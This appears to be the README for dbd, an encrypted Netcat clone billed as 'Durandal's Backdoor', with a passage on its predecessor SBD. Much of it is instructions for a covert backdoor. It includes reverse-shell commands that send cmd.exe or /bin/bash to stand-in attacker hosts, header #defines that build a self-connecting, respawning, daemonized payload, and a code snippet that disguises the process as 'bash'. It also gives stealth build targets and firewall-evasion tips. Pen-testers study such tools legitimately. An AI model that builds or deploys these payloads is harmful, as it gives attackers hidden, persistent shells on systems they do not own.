Encrypted Netcat
###SYNOPSIS #Durandal's Backdoor #Copyright (C) 2013 Kyle Barnthouse [email protected] #dbd is distributed under the GNU GPL
DBD is a slightly modified version of SBD Shadowinteger’s Backdoor (SBD) is another Netcat variant, with all of the features of the original Netcat plus some new ones. SBD is available for both Windows and *nix, with pre-compiled binaries included in the single g-zipped file from http://security.cycom.se/dl/sbd. This feature alone makes SBD a good candidate to settle on as your Netcat-like utility of choice. If that is not enough reason, it offers encryption like cryptcat, and a respawn option, providing the –L functionality for both Windows and *nix hosts.
You can put a wrapper script around any version of Netcat to cause it to restart on *nix, but with SBD providing that functionality built-in, there is little need for such effort. While the basic operation of SBD remains much the same as the other Netcat-like tools, there are a couple of additional options that could be useful for transferring files.
SBD allows you to specify the source port via the –p option if you are running in client mode (in server mode, –p specifies the listening port as usual). This feature could allow you to get through a firewall by making the SBD session look like a reply to a friendly protocol such as DNS. Of course, this trick is not going to fool a statefull firewall, but having this increased control never hurts.
The –r option allows you to tell SBD to re-spawn after a client disconnect instead of the default Netcat behavior, which is to shut down the server.You can also configure a delay in seconds before re-spawning, this delay could be useful to help slow down any attempts to brute force your listening process. The Windows version of Netcat provides the same functionality via the –L option, while the original *nix version offers no such option. The delay can be set to zero seconds which provides identical behavior to the Windows Netcat –L option.
With cryptcat, encryption is enabled by default, even if you do not specify a shared secret key. SBD takes the same approach except encryption can be disabled completely via the –c option (–c off disables encryption, –c on is the default).
Similar to cryptcat, the –k option is used to specify the shared secret key.
Another interesting option is –P, which is used to specify a prefix for incoming data. The original intent seems to be to facilitate SBD as a primitive chat client; however, it could also be useful to provide a sort of data “tag” for the server to log. Take for example, a scenario where you have two or more systems running a custom script you created. You want each system to log a status message so you know the process completed successfully. You could program in a custom message on each host, or grab a variable from the environment, or you could also have SBD add the “tag.”
The only other consideration to be aware of concerns SBD’s behavior after a file transfer is completed. Unlike the original Netcat, SBD closes the connection after the file transfer is completed. This behavior makes the use of the –w option obsolete.
dbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. dbd supports TCP/IP communication only. Source code and binaries are distributed under the GNU General Public License.
$ make
make unix - Linux, NetBSD, FreeBSD, OpenBSD
make unix32 - Linux, NetBSD, FreeBSD, OpenBSD 32-bit
make sunos - SunOS (Solaris)
make win32 - native win32 console app (w/ Cygwin + MinGW)
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
make mingw - native win32 console app (w/ MinGW MSYS)
make mingwbg - native win32 no-console app (w/ MinGW MSYS)
make mingwbg CFLAGS=-DSTEALTH - stealthy no-console app (w/ MinGW MSYS)
make cygwin - Cygwin console app
make darwin - Darwin
cross-compile options:
make mingw-cross - win32 cross compile (i586-mingw32msvc-gcc)
make mingwbg-cross - win32 no-console cross compile (i586-mingw32msvc-gcc)
make mingwbg-cross CFLAGS=-DSTEALTH - stealthy win32 cross compile
make unix CROSS_COMPILE=<path/to/toolchain-> - cross compile for any arch
roll up a tarball (move your compiled stuff to binaries/ first:
make dist - create tarball with source files, readme, and binaries/
To compile dbd under a Unix-like operating system you need gcc and relevant development tools. For Linux, FreeBSD, NetBSD, OpenBSD (and possibly others), type:
$ make unix
For SunOS/Solaris, type:
$ make sunos
To compile dbd under Microsoft Windows (NT/2K/XP/2K3) you need MinGW+MSYS, or Cygwin with full development support (Cygwin's MinGW gcc). To compile a native Win32 dbd console application under Cygwin, type:
$ make win32
or, under MSYS:
$ make mingw
To compile a no-console ("WinMain") application under Cygwin, type:
$ make win32bg
or, under MSYS:
$ make mingwbg
To compile a Cygwin-specific console application, type:
$make cygwin
You may want to change the default behaviour of dbd. One of the most important thing is to change the default shared secret to your own pass phrase. Edit dbd.h and replace with your preferences. You may, for example, want to hardcode a host + port to connect to if dbd is started without options. Complete examples are provided in dbd.h.
With a little imagination, dbd can be used for many things:
Use dbd to securely transfer files between two networks:
snafu$ dbd -l -p 12345 -k secret > output.file
fubar$ cat input.file | dbd -k secret snafu 12345
or from win32:
C:\somedir>type input.fil | dbd -k secret snafu 12345
Use dbd as a simple (but secure) chat:
snafu$ dbd -P snafu -Hon fubar 1234
fubar$ dbd -Pfubar -Hon -l -p 1234
Use dbd as a pen-test backdoor:
C:\hacked box>dbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443
or under Unix-like OSes:
root@owned# ./dbd -r1800 -Don -e /bin/bash hacker.tld 993
In addition to using command line options, you can hard code variables by using #defines in dbd.h. To do this, set the variables you wish to use as named constants and compile as normal. For example, if you wanted to hard code a dbd executable that connected back to "evil.nationalbankofuganda.com" on port 995, and executed "/bin/bash" you could run:
root@owned# ./dbd -e /bin/bash evil.nationalbankofuganda.com 995
or using hard-coded #defines, you could edit dbd.h:
#define DOLISTEN 0
#define HOST "evil.nationalbankofuganda.com"
#define PORT 995
#define EXECPROG "/bin/bash"
You can also set respawn and stealth options to help maintain your connection:
#define QUIET 1
#define DAEMONIZE 1
This will set the connection to daemonize ("melt" in malware terms), never send output to STDOUT, and attempt to respawn the connection every 15 minutes should it ever disconnect from the listener.
Now we're getting into the fun stuff. Once you are a mastar at hard-coding options into your backdoor, you can use what is quite possibly the most fun named constant at our disposal: CLOAK. To do this, simply set the value:
#define CLOAK 1
NOTE: this currently only works on *nix compiles. Eventually I plan on adding Win32 process migration/hooking so those targets can feel some Romulan love as well.
For *nix environments, this option scrubs argv[0] and replaces it with the string "bash\0". It also scrubs all other argv[]'s (it'd look silly if ps returned "bash -e /bin/bash someremotehost.com 443" now wouldn't it?) I hope it goes without saying that you CANNOT USE THIS OPTION UNLESS YOU ARE HARD CODING YOUR VARIABLES INTO DBD.H. Also, if you're testing this on your own system it's gonna be fun picking the right pid to kill. ;)
Feel free to use this scrubber in anything you happen to be working on:
//grab our named constant
int cloak = CLOAK;
//Engage cloaking device
#ifdef WIN32
//change argv[0] to say bash
int scrub;
strncpy((char *)argv[0], "\0", strlen((char *)argv[0]) + 1);
strcpy((char *)argv[0], "bash\0");
for (scrub = 1; scrub < argc; scrub++)
strncpy((char *)argv[scrub], "\0", strlen((char *)argv[scrub]) + 1);
Do not pass cached input (a file with commands or similar) to a listening "dbd -e" session. "dbd -e" is using pipes to pass data between the program being executed and dbd. Pipes are used (instead of plain pass-through duplicate file descriptors) because of encryption between the pipes and the socket. In order to prevent the writing end of one of the pipes from blocking the whole process, I turned it into a non-blocking descriptor. There is a chance that when passing too much input at a time through to the -e program, it will be truncated (cut off) since the pipe buffer (in the OS) can't hold all of the data. This problem can be solved by making dbd multi-threaded for instance, but I'll avoid this as long as possible for compatibility reasons.
Since dbd was designed to interoperate with other tools/frameworks, make now allows win32 cross compiling on Linux systems that have the mingw32-gcc toolchain. These options are almost identical to their Windows-native counterpart with the addition of "-cross" after the chosen build. Example:
$ make mingw-cross
will do the same thing on a Linux system that
$ make mingw
would do on a win32 system with mingw/msys installed on it.
Right now all cross-compile options are built with Kali Linux in mind, but should work on any *nix with a little love. If you have mingw32-gcc installed and make won't build, edit the WCC variable at the top of the Makefile and put the path to your mingw32-gcc binary.
As of dbd-1.5 you can use any crossbuild toolchain to compile dbd by setting the toolchain prefix as CROSS_COMPILE. For example, building an arm version is as easy as:
$ make unix CROSS_COMPILE=arm-linux-gnueabi-
If you wish to integrate dbd with an exploitation framework, you can write a module that generates a custom dbd.h with configuration options specific to your target. Anything not explicitly #defined in this file will still use the defaults so you don't have to write everything in the header. Example: have a file rm dbd.h and replace with:
#define DOLISTEN 0
#define HOST "evil.nationalbankofuganda.com"
#define PORT 995
#define EXECPROG "/bin/bash"
#define QUIET 1
#define CLOAK 1
#define SHARED_SECRET "customcrypto"
then call make to build an auto connecting payload with cloaking and respawning that connects back to a listening dbd agent on evil.nationalbankofuganda.com running with the options:
$ dbd -l -p 995 -k customcrypto
Another advanced trick is to compile dbd using dietlibc or uClibc. to compile a dietlibc linux dbd agent, use:
$ make unix CROSS_COMPILE="diet -Os "
Pay attention to the space after the s in the string. This allows the Makefile to add gcc with the standard CFLAGS and LDFLAGS so your agent builds properly. The advantage of using dietlibc is that it produces a very tiny 100% static executable for the target environment (around 70K for a linux dbd agent before packing as opposed to the standard 700K+ with glibc and gcc -static). Using uClibc is even easier, since you just set the crossbuild prefix for your toolchain under CROSS_COMPILE.
dbd Copyright (C) 2013 Kyle Barnthouse [email protected]
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
dbd's AES-CBC-128 + HMAC-SHA1 implementation is Copyright (C) Christophe Devine [email protected] and is distributed under the GNU General Public License (GPL).
Some code (for doexec_win32.h) has been derived from doexec.c from the Win32 port of Netcat (C) Weld Pond and hobbit. Parts of doexec.c is Copyright (C) 1994 Nathaniel W. Mishkin (doexec.c code was originally derived from rlogind.exe).
The original version of Netcat was written by hobbit [email protected]. The NT version was done by Weld Pond [email protected].
(C) Kyle Barnthouse [email protected]
Security Consultant
Hephaestus Security